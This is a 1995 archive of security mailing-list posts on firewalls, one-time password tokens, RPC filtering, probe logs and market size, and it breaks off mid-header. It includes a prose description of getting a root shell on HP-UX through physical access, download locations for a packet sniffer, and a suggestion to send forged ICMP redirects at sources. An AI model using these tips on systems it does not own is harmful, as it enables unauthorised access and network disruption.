firewalls-owner Fri May 12 01:09:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09954 for firewalls-outgoing; Fri, 12 May 1995 00:40:40 -0700 Received: from ford.gbnet.org (ford.gbnet.org [192.188.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA09949 for ; Fri, 12 May 1995 00:40:36 -0700 Received: (from steve@localhost) by ford.gbnet.org (8.6.12/8.6.12) id IAA29541; Fri, 12 May 1995 08:40:52 +0100 From: Steve Kennedy Message-Id: <199505120740.IAA29541@ford.gbnet.org> Subject: Re: password backdoors To: kimminau@Mail.Coast.NET (Eric Kimminau) Date: Fri, 12 May 1995 08:40:52 +0100 (BST) Cc: firewalls@greatcircle.com In-Reply-To: from "Eric Kimminau" at May 11, 95 08:21:51 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1329 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Eric Kimminau > > I am sure your HP engineer was just boasting, I am sure there are no > > 'password backdoors' in Domain/OS. However, Domain/OS (as installed by > > default) has many other security holes which allow anyone (preferably with > > physical access) to do anything they like. Even though this is a full > > disclosure list, I would prefer not to elaborate on how to expoit these > > holes, but rather point you to a set of scripts which close most (all?) of > > them: > Its very possible to boot an HPUX box as root if you have physical access > to the machine, power off, power on, let fsck begin, power off, power on. > Single user fsck root shell. They got rid of this one ... You could also do clever things from the ISL> prompt ... And of course if you built an Emergency Boot tape (or whatever HP called it) you could boot from the tape (a memory file system etc), mount the real disks and presto ... Steve -- home steve@gbnet.org * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU work steve@demon.net * tel +44-(0)171 483 1169 FAX +44-(0)181 444 6103 www http://www.gbnet.net/ * GSM mobile +44-(0)802 444 500 bits steve@gbnet.net * GSM data @2400 0802-449500 @9600 449501 fax 449502 Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk) From firewalls-owner Fri May 12 05:09:55 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA13927 for firewalls-outgoing; Fri, 12 May 1995 04:42:11 -0700 Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA13922 for ; Fri, 12 May 1995 04:42:08 -0700 Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id HAA15300 for ; Fri, 12 May 1995 07:42:49 -0400 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA05213; Fri, 12 May 95 07:41:36 EDT Date: Fri, 12 May 95 07:41:36 EDT Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: fyi: Gobbler Locations Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Host brother.cc.monash.edu.au Location: /copy/dnpap.et.tudelft.nl DIRECTORY drwxr-xr-x 512 Jan 22 1992 Gobbler Host dutiws.twi.tudelft.nl Location: /pub/other_sites/.dutepp0/Fergie/old.hi.a DIRECTORY drwxrwxr-x 512 Oct 3 1993 Gobbler Host ftp.sunet.se Location: /pub/network/monitoring/Fergie/old.hi.a DIRECTORY drwxrwxr-x 8192 May 9 1994 Gobbler ---- From: ralph@omni.mpsisys.com (Ralph Mitchell) Subject: Re: Gobbler To: mckenney@smiley.mitre.org (Brian W. McKenney) Date: Thu, 11 May 1995 16:18:00 -0500 (CDT) > A while back, Christopher Klaus (cklaus@iss.net) posted a FAQ file on > Sniffers. He noted that the Gobbler sniffer is available for DOS machines. > Does anyone know where this is available on the Internet (e.g., FTP site)? > I did ask Christopher, but he did not have a location. This is extracted from the ls-lR on UUNET: systems/ibmpc/msdos/wattcp/delft: total 524 -rw-rw-r-- 1 archive 1004 Feb 28 1992 READ.ME -rw-rw-r-- 1 archive 159204 Feb 28 1992 beholder.zip -rw-rw-r-- 1 archive 118934 Feb 28 1992 gobbler.zip -rw-rw-r-- 1 archive 4661 Oct 11 17:01 ne2.com.Z -rw-rw-r-- 1 archive 7062 Oct 11 17:01 ne2000.com.Z -rw-rw-r-- 1 archive 6947 Oct 11 17:01 ne2100.com.Z -rw-rw-r-- 1 archive 204093 Feb 28 1992 sage.tar.Z Enjoy ! Ralph Mitchell (System Administrator) -- MPSI Inc., 8282 South Memorial Drive, Tulsa, Oklahoma 74133 Email: ralph@mpsisys.com PHONE: 918-250-9611 x237 FAX: 918-254-8764 "Never underestimate the power of human stupidity" - Salvor Hardin, Foundation From firewalls-owner Fri May 12 05:41:29 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA14390 for firewalls-outgoing; Fri, 12 May 1995 05:27:16 -0700 Received: from i17linuxb.ists.pwr.wroc.pl (i17linuxb.ists.pwr.wroc.pl [156.17.35.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA14377 for ; Fri, 12 May 1995 05:27:00 -0700 Received: (from marekm@localhost) by i17linuxb.ists.pwr.wroc.pl (8.6.12/8.6.9) id OAA01675; Fri, 12 May 1995 14:26:39 +0200 From: Marek Michalkiewicz Message-Id: <199505121226.OAA01675@i17linuxb.ists.pwr.wroc.pl> Subject: What's up? To: danielh@panbio.com Date: Fri, 12 May 1995 14:26:38 +0200 (MET DST) Cc: firewalls@greatcircle.com X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1905 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Could you explain me what's up? I am getting many mail messages like this, and I don't want them (because they fill up my mailbox - messages from the firewalls mailing list are placed in the right folder by procmail, but messages like the one below are not - I don't know how procmail could distinguish this from a private mail message). Maybe something wrong happened to the mailing list software? This message looks like it is from me, but I never sent a message with such a long "To:" list. My original message was sent to the author of the message about the Linux bug, and Cc: firewalls@greatcircle.com. Thanks in advance for any help, and sorry about my ignorance if this is a feature, not a bug :-). Regards, -- Marek Michalkiewicz > From danielh@panbio.com Fri May 12 04:36:33 1995 > X-Sender: danielh@pangea.panbio.com (Unverified) > Message-Id: > Mime-Version: 1.0 > Content-Type: text/plain; charset="us-ascii" > Date: Thu, 11 May 1995 19:33:26 +0900 > To: nto2584@tserver.dsac.dla.mil (Steven Payne), > patrick@oes.amdahl.com (Patrick Horgan), Alan Hannan , > Danny Boulet , vin@shore.net (Vin McLellan), > toreh , "Michael L. Sapp" , > bret@real.com (Bret McDanel), "Ken Paquette" , > Marek Michalkiewicz , > Christopher Klaus , > Brent@GreatCircle.COM (Brent Chapman), jcarroll@wellspring.us.dg.com, > Dan Schlitt , > "Marcus J. Ranum" , John_Reinke@pcmailgw.ml.com > From: Marek Michalkiewicz (by way of > danielh@pangea.panbio.com (Dan Hillman)) > Subject: Re: Linux as multi-homed firewall... (fwd) [snip] From firewalls-owner Fri May 12 06:09:56 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA14850 for firewalls-outgoing; Fri, 12 May 1995 05:54:59 -0700 Received: from ix5.ix.netcom.com (ix5.ix.netcom.com [199.182.120.9]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA14845 for ; Fri, 12 May 1995 05:54:57 -0700 Received: from by ix5.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id FAA07558; Fri, 12 May 1995 05:55:15 -0700 Date: Fri, 12 May 1995 05:55:15 -0700 Message-Id: <199505121255.FAA07558@ix5.ix.netcom.com> From: tbudar@ix.netcom.com (Thomas Budar) Subject: Changing The Firewalls Mailing List Name To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have been reading this list for a couple of months and have seen the topics drift away from firewalls to issues of legal liability to "I know this should not be posted here but I have a question anyway..." Perhaps It's time to change the name of the list to represent its evolving content. Tom Budar From firewalls-owner Fri May 12 06:40:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA15266 for firewalls-outgoing; Fri, 12 May 1995 06:13:54 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA15261 for ; Fri, 12 May 1995 06:13:51 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA17654; Fri, 12 May 1995 09:14:28 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA29512; Fri, 12 May 1995 09:14:26 -0400 Message-Id: <9505121314.AA29512@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: long-morrow@CS.YALE.EDU (H Morrow Long), firewalls@greatcircle.com Date: Fri, 12 May 1995 09:14:18 -0500 Subject: Re: Requesting "echo" Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 11 May 95 at 16:01, H Morrow Long was heard to utter: > >2) How should a firewall respond when it receives a request for one of > >these services and they are being denied? > > o Log it. > o Notify network administration via E-Mail, pager, etc. > o Take pro-active defense measures such as send its own > nasty ICMP messages (such as ICMP network unreachables and > redirects for net 0 ) back to the source :-) The first two are obvious to implement. I like the last option. Any way to set this up to work automagically? I'm thinking in the context of the TIS fwtk, with the DMZ choked off with a Cisco, which in turn logs to the bastion host. -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## If you like this sort of thing, ## ## this is the sort of thing you'll like. ## From firewalls-owner Fri May 12 08:09:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA16788 for firewalls-outgoing; Fri, 12 May 1995 08:07:33 -0700 Received: from [198.102.244.39] (pm-ppp-1.greatcircle.com [198.102.244.39]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA16783; Fri, 12 May 1995 08:07:21 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 12 May 1995 08:08:11 -0800 To: tbudar@ix.netcom.com (Thomas Budar) From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Changing The Firewalls Mailing List Name Cc: mcb@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 05:55 5/12/95, Thomas Budar wrote: >I have been reading this list for a couple of months and have seen the >topics drift away from firewalls to issues of legal liability to "I >know this should not be posted here but I have a question anyway..." >Perhaps It's time to change the name of the list to represent its >evolving content. Oh, that's a very helpful suggestion. What a wonderful idea. Gee, why didn't I think of that; that would solve everything. It's so obvious. All right folks, I'm going to break the rules and talk about meta-issues. This is NOT an invitation for discussion; if you feel you simply _have_ to say something about this topic, say it to me and MCB@GreatCircle.COM directly; MOST of the rest of the subscribers aren't interested, and posting meta-discussions like this just makes things worse. All mailing lists go through cycles. That's just the way it is. No list can be low-volume, high-content on a continuous basis. Sometimes its low-volume, low-content; high-volume, high-content; or high-volume, low-content. Right now, Firewalls happens to be high-volume, low-content. Just relax, it'll get better soon; it always does. And before somebody asks: no, I don't think Firewalls should be moderated, except as it is now (i.e., on an occasional basis to squelch flame wars). Many of the best discussions on Firewalls over the last couple of years have been fast and furious quick-turnaround discussions on various topics. The time lag involved in moderation would drasticly change that dynamic, and I think that might destroy the list. So, if you don't like the volume, switch to the digest (send the commands "subscribe firewalls-digest" and "unsubscribe firewalls" in the body of a message to "Majordomo@GreatCircle.COM"). Or get a better mail reader that can handle the volume. Or gateway Firewalls to a local newsgroup and use a newsreader (a _local_ newsgroup, I said; a net-wide gatewayed Firewalls newsgroup would almost certainly make the volume/content problems worse, not better). If you don't think you're getting enough useful out of the list, then unsubscribe. Don't whine about it to the rest of us; we don't care, and you're just making the problem worse. If you want, check back again in a few weeks; maybe you'll find things more to your liking. -Brent ---------------------------------------------------------------------- For info about the Internet Security Firewalls Tutorial and a schedule of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM ---------------------------------------------------------------------- Brent Chapman Great Circle Associates Brent@GreatCircle.COM 1057 West Dana Street +1 415 962 0841 Mountain View, CA 94041 From firewalls-owner Fri May 12 08:40:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA17014 for firewalls-outgoing; Fri, 12 May 1995 08:18:58 -0700 Received: from netman-mel.dfci.harvard.edu (netman-mel.dfci.harvard.edu [155.52.46.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA17009 for ; Fri, 12 May 1995 08:18:52 -0700 Received: (from ellozy@localhost) by netman-mel.dfci.harvard.edu (8.6.11/8.6.11) id LAA20334 for firewalls@GreatCircle.COM; Fri, 12 May 1995 11:19:32 -0400 From: Mohamed Ellozy Message-Id: <199505121519.LAA20334@netman-mel.dfci.harvard.edu> Subject: Comparative evaluations of firewall products? To: firewalls@GreatCircle.COM Date: Fri, 12 May 1995 11:19:32 -0400 (EDT) Reply-To: ellozy@dfci.harvard.edu X-Organization: Dana-Farber Cancer Institute X-phone: 617-632-3034 X-Mailer: ELM [version 2.4 PL22] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 150 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are there any published comparative evaluations of firewall products? Is anyone willing to share an unpublished evaluation with me? Thanks. Mohamed From firewalls-owner Fri May 12 09:41:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA18382 for firewalls-outgoing; Fri, 12 May 1995 09:37:18 -0700 Received: from uuneo.neosoft.com (uuneo.NeoSoft.COM [198.64.84.252]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA18377 for ; Fri, 12 May 1995 09:37:15 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id LAA29192 for GreatCircle.COM!firewalls; Fri, 12 May 1995 11:07:02 -0500 Received: by ris1.nmti.com (smail2.5) id AA01989; 12 May 95 09:53:19 CDT (Fri) Received: by sonic.nmti.com; id AA26511; Fri, 12 May 1995 10:14:23 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9505121514.AA26511@sonic.nmti.com.nmti.com> Subject: Re: Changing The Firewalls Mailing List Name To: tbudar@ix.netcom.com (Thomas Budar) Date: Fri, 12 May 1995 10:14:23 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199505121255.FAA07558@ix5.ix.netcom.com> from "Thomas Budar" at May 12, 95 05:55:15 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 583 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I have been reading this list for a couple of months and have seen the > topics drift away from firewalls to issues of legal liability to "I > know this should not be posted here but I have a question anyway..." > Perhaps It's time to change the name of the list to represent its > evolving content. This might be a better idea than creating a "firewalls-chat" list. The "freebsd-hackers" list got split into "hackers" and "chat" and "hackers" is still full of chat. Or split it into "firewalls-technical" and "firewalls-political" with everyone initially subscribed to both. From firewalls-owner Fri May 12 10:14:55 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA18446 for firewalls-outgoing; Fri, 12 May 1995 09:42:14 -0700 Received: from relay1gw.alcatel.fr (relay1gw.alcatel.fr [193.104.30.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA18434 for ; Fri, 12 May 1995 09:42:08 -0700 Received: from istans.ansf.alcatel.fr by relay1gw.alcatel.fr with SMTP (1.37.109.8/16.2) id AA27360; Fri, 12 May 1995 18:41:29 +0200 Received: from ahqp14.ansf.alcatel.fr ([155.132.120.211]) by istans.ansf.alcatel.fr (4.1/SMI-4.1) id AA13053; Fri, 12 May 95 18:44:11 +0200 Message-Id: <9505121644.AA13053@istans.ansf.alcatel.fr> From: "Kare Presttun" Organization: Alcanet International To: Firewalls@GreatCircle.COM Date: Fri, 12 May 1995 18:43:19 CET Subject: One time password tokens Priority: normal X-Mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The purpose of writing this was just to make the picture more complete with adding history as a possible way of synchronizing. > ------------------------------ > > From: vin@shore.net (Vin McLellan) > Date: Wed, 10 May 1995 16:49:05 -0500 > Subject: One Time Password Tokens > > Kare Presttun declared: > > >The correct statement is that there are two classes of tokens, > >asynchronous ans synchronous. The first one is what is called > >challenge response. The second category contains two technologies, > >time synchronous and history synchronous. The secure ID is time > >synchronous, and the new tokens from Enigma Logic can operate in > >both asynchronous and history synchronous mode (nice technology > >Bob). The history synchronous technology does not have the drawback > >that the password is valid within a time window. > > With respect, this stuff about a "history synchronous" token is > marketing > gobblygook. > > This is a repackaged technology Enigma first introduced on > one of their big "squashed bannana" tokens in the early 1980s and then > withdrew -- I always thought -- because of its inherent security > weaknesses. When cards became the rage, it came back. > > What we have here is a token which provides a sequential list of valid > access codes upon demand. (Think of it as a Radio Shack version of the > paper list of S/key codes you see guys pulling from their wallets at > conventions.) > It is not. It contains a counter instead of the clock. > Codes can thus be loaned to friends (a common problem) or punched > out in advance so as to avoid carrying the token. With this technology -- > unlike Enigma's standard C/R token -- there is no requirement that the > token be physically present when a valid access call is submitted to a > server. > Wrong again, see above. > (The whole idea behind a token is that -- as a tangible physical > device required to impliment the access process -- it can not be in more > than one place at a time. This tech tosses the whole idea of a token into > loonyland.) Yes, you have to tie together something the user knows (PIN) with something the user has (token). In general to have a strong system you have to select two methods from two different classes of the tree: something the user knows, something the user has, and something about the user (biometrics). Common combinations are the way you look combined with an ID card, or a PIN code combined with an ATM card. > > There are also some obvious potential problems in keeping the > token's list and the server's list in synch. (In the original version, > there was also a security issue in the way in which the server had to > broaden the access window to search for a token out of sequential synch, > but I forget the details.) Also, since you obviously can't feed a > sequential list to more than one server, this is a one-machine logon device > - -- or, at least, it was with the original one-seed version. > > Enigma Logic makes several solid reliable products which perform as Yes they do > promised. I thought this one was a turkey ten years ago, and I think it is > a turkey today. (Sorry, Bob;-) Anyone who thinks they can educate me, I think it is ten years since you looked at their technology. If you want to know what they do, take a look at their FTP server. > or otherwise convince me that this is not a dangerous, silly, insecure > product is welcome to add their 2 cents. > $ 0.02 > Suerte, > > _Vin > > - -- > Vin McLellan +The Privacy Guild+ USA > Tel. (617) 884-5546 Mail: 53 Nichols St., Chelsea, Ma. 02150 Kare ================================================================ * Kare Presttun Tel: +33 1 4058 5614 * * Alcanet International Fax: +33 1 4058 5945 * * 33, rue Emeriau Kare.Presttun@ansf.alcatel.fr * * F-75015 Paris * * France * ================================================================ From firewalls-owner Fri May 12 14:40:57 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA21404 for firewalls-outgoing; Fri, 12 May 1995 12:43:10 -0700 Received: from iss.net (iss.iss.NET [204.241.60.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA21399 for ; Fri, 12 May 1995 12:43:07 -0700 Received: (from cklaus@localhost) by iss.net (8.6.4/8.6.4) id PAA12255 for firewalls@greatcircle.com; Fri, 12 May 1995 15:59:35 -0700 From: Christopher Klaus Message-Id: <199505122259.PAA12255@iss.net> Subject: Firewall Marketplace To: firewalls@greatcircle.com Date: Fri, 12 May 1995 15:59:35 +1494730 (PDT) X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 666 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone have any statistics that indicate the size of the firewall market? This may be extrapolated from how many companies are connecting to the Internet daily. Is there any statistics on that? I believe Internic was getting close to 5000 domain name requests over a 2 week people? but I doubt that even comes close to how many companies are actually connecting to the Internet each week. Cheers, Christopher -- Christopher William Klaus Voice: (404)441-2531. Fax: (404)441-2431 Internet Security Systems, Inc. Computer Security Consulting 2000 Miller Court West, Norcross, GA 30071 ========================< http://iss.net/~iss >========================= From firewalls-owner Fri May 12 15:10:52 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA21448 for firewalls-outgoing; Fri, 12 May 1995 12:48:40 -0700 Received: from pan-firewall.panbio.com (gatekeeper.panbio.com [198.68.123.154]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA21443 for ; Fri, 12 May 1995 12:48:36 -0700 Received: (from uucp@localhost) by pan-firewall.panbio.com (8.6.12/8.6.12) id MAA02884 for ; Fri, 12 May 1995 12:50:10 -0700 Received: from pangea.panbio.com(192.168.169.11) by pan-firewall.panbio.com via smap (V1.3) id sma002882; Fri May 12 12:49:58 1995 Received: from [192.168.169.7] (queen.panbio.com [192.168.169.7]) by pangea.panbio.com (8.6.12/8.6.12) with SMTP id MAA20147; Fri, 12 May 1995 12:56:22 -0700 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 12 May 1995 12:49:08 +0900 To: Firewalls@GreatCircle.COM From: danielh@panbio.com (Dan Hillman) Subject: Sorry about the misrouted mail... Cc: danielh@panbio.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thursday night, in error, I sent a number of people on the Great Circle firewalls mailing-list a series of messages that I believed were being rerouted to a second mail-account that I own. Please accept my sincere apologies and assurances that it won't happen again. *Potential security risk* Warning to all you Eudora (Qualcomm's mail program) admin's out there: a new user attempting to make a nickname may not know that the nickname will be expanded into all the senders addresses that happen to be selected in a mailbox at that time. Sure would be nice if Eudora at least *asked confirmation* for a new nickname. Maybe I should RTFM. (shudder) Anyway, sorry again, -Dan From firewalls-owner Fri May 12 22:13:29 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA02211 for firewalls-outgoing; Fri, 12 May 1995 22:00:50 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA02206 for ; Fri, 12 May 1995 22:00:46 -0700 Message-Id: <199505130500.WAA02206@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA290151310; Sat, 13 May 1995 15:01:50 +1000 From: Darren Reed Subject: Re: A Probe? To: jpf@mig.com (Jack Flory) Date: Sat, 13 May 1995 15:01:50 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199505110422.WAA16152@mig.com> from "Jack Flory" at May 10, 95 10:22:19 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1082 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Jack Flory, they said: > > Forgive me for my lapses... I have not subscribed to the list > for some time. However, I ran across the following sequence > in my log files and I thought some of you might have a few > ideas about the pattern. Does this appear to be an organized > probe? This is one of the few irregularities that I have not been > able to trace to routing flaps due to Internet restructuring. > Please reply directly to keep the S/N ratio low. ThankX. > > May 10 20:54:11 gateway screend[4377]: REJECT: UDP > [204.240.1.23]->[204.132.146.71](2769->7) > May 10 20:54:11 gateway kernel: REJECT (IN): UDP > [204.240.1.23]->[204.132.146.17](2715->7) ulen 13 on eth0 Not this one...or maybe...if it was only port 7, then the only reason you'd do this would be to `ping' a host without pinging it. Why would you do this ? SATAN pings hosts before doing a udpscan on them; a program I wrote 2 years ago would do a UDP scan but used port 7 (echo) instead of ping/ICMP ECHO to estimate RTT. That didn't look much like an attack, however. darren From firewalls-owner Fri May 12 23:13:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA02972 for firewalls-outgoing; Fri, 12 May 1995 23:06:11 -0700 Received: from serome.serome.co.kr ([203.248.10.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA02967 for ; Fri, 12 May 1995 23:06:04 -0700 Received: (from zomo@localhost) by serome.serome.co.kr (8.6.9H1/8.6.9) id PAA07888 for firewalls@GreatCircle.COM; Sat, 13 May 1995 15:03:17 +0900 From: Danny Yang Message-Id: <199505130603.PAA07888@serome.serome.co.kr> Subject: How does Firewall-1 filter RPC services? To: firewalls@GreatCircle.COM Date: Sat, 13 May 1995 15:03:16 +0900 (JST) X-Mailer: ELM [version 2.4 PL21-h4] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-2022-kr Content-Transfer-Encoding: 7bit Content-Length: 246 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry if it had been discussed before. I'd like to know how Firewall-1 filters RPC services. Does it filter simply connection to portmapper(TCP/UDP 111) or can admin set filtering rules for indivisual RPC services? Thanks in advance. -danny From firewalls-owner Sat May 13 02:43:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA05546 for firewalls-outgoing; Sat, 13 May 1995 02:19:03 -0700 Received: from sequoia.itd.uts.EDU.AU (sequoia.itd.uts.EDU.AU [138.25.16.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA05538 for ; Sat, 13 May 1995 02:18:54 -0700 From: T.Greenland@uts.EDU.AU Received: by sequoia.itd.uts.EDU.AU id AA28720 (5.65c/IDA-1.4.4 for firewalls@greatcircle.com); Sat, 13 May 1995 19:18:32 +1000 Date: Sat, 13 May 1995 19:16:00 +1000 (EST) Subject: Re: Requesting "echo" To: firewalls@greatcircle.com In-Reply-To: <9505121314.AA29512@wellspring.us.dg.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > >2) How should a firewall respond when it receives a request for one of > > >these services and they are being denied? > > > > o Log it. > > o Notify network administration via E-Mail, pager, etc. > > o Take pro-active defense measures such as send its own > > nasty ICMP messages (such as ICMP network unreachables and > > redirects for net 0 ) back to the source :-) what do you mean "net 0"? the default route (0.0.0.0)? can someone clarify this for me please? Tim Greenland T.Greenland@uts.edu.au Information Technology Division Phone: +61 2 330 2116 University of Technology, Sydney Fax: +61 2 330 1994 From firewalls-owner Sat May 13 08:13:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07868 for firewalls-outgoing; Sat, 13 May 1995 07:55:58 -0700 Received: from access.mbnet.mb.ca (access.mbnet.mb.ca [130.179.16.143]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA07858 for ; Sat, 13 May 1995 07:55:55 -0700 Received: by access.mbnet.mb.ca id AA26503 (5.67b/IDA-1.4.4 for firewalls@greatcircle.com); Sat, 13 May 1995 09:55:39 -0500 Date: Sat, 13 May 1995 09:55:39 -0500 (CDT) From: Oliver Friedrichs To: firewalls@greatcircle.com Subject: Re: How does Firewall-1 filter RPC services? In-Reply-To: <199505130603.PAA07888@serome.serome.co.kr> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 13 May 1995, Danny Yang wrote: > I'd like to know how Firewall-1 filters RPC services. > Does it filter simply connection to portmapper(TCP/UDP 111) or > can admin set filtering rules for indivisual RPC services? It looks inside the packet to identify which application it is. It also communicates with the portmappers on the inside network to obtain the port numbers. - Oliver From firewalls-owner Sat May 13 08:44:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA08268 for firewalls-outgoing; Sat, 13 May 1995 08:38:37 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA08263 for ; Sat, 13 May 1995 08:38:35 -0700 Received: from [204.57.49.106] by northshore.ecosoft.com with SMTP id AA21167 (5.67a/IDA-1.5 for ); Sat, 13 May 1995 11:37:24 -0400 Date: Sat, 13 May 1995 11:37:24 -0400 Message-Id: <199505131537.AA21167@northshore.ecosoft.com> X-Sender: jr@shore.net Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Christopher Klaus , firewalls@greatcircle.com From: jr@vc.com (Jonathan Roosevelt) Subject: Re: Firewall Marketplace Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On May 12 Christopher Klaus was heard to utter: >Anyone have any statistics that indicate the size of the firewall market? >This may be extrapolated from how many companies are connecting to the >Internet daily. Is there any statistics on that? > >I believe Internic was getting close to 5000 domain name requests over a >2 week people? but I doubt that even comes close to how many companies >are actually connecting to the Internet each week. This is a question with which I have been trying to grapple. I'm happy to share my thoughts, although I caution you to gurgle them with some salt. There are roughly 50,000 .com domain names and prabably 110,000 total domain names (how many are in use I don't know -- but I think the latest statistic on Web server sites is 35,000) At the current growth rate, there should be 65,000 .com domain names by the end of June. A recent Yankee Group survey found that 88% of Fortune 1000 businesses with Internet connections checked "firewall" in response to the following question: "What security measures have you taken or will you take to protect your network or transmissions?" 29% answered "internal only," 18% answered "external only," and 41% answered "both internal and external." I was figuring an average of 2 firewalls/Fortune 1000 (is this reasonable?), which at $20K/firewall translates into a $40 million Fortune 1000 firewall opportunity. I'd be interested in any thoughts on how many Fortune 1000 firewall purchases anyone thinks have been made and in thoughts on what percent of the market belongs to Fortune 1000 sales. On the government side, one vendor told me that the Federal Government will purchase 3,000 firewalls over the next one to two years. At $20K/firewall, this would be a $60 million opportunity. I welcome any comments. Jonathan Roosevelt Battery Ventures 200 Portland Street Boston, MA 02114 voice: (617)367-1011 fax: (617)367-1070 From firewalls-owner Sat May 13 09:02:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA08059 for firewalls-outgoing; Sat, 13 May 1995 08:26:21 -0700 Received: from 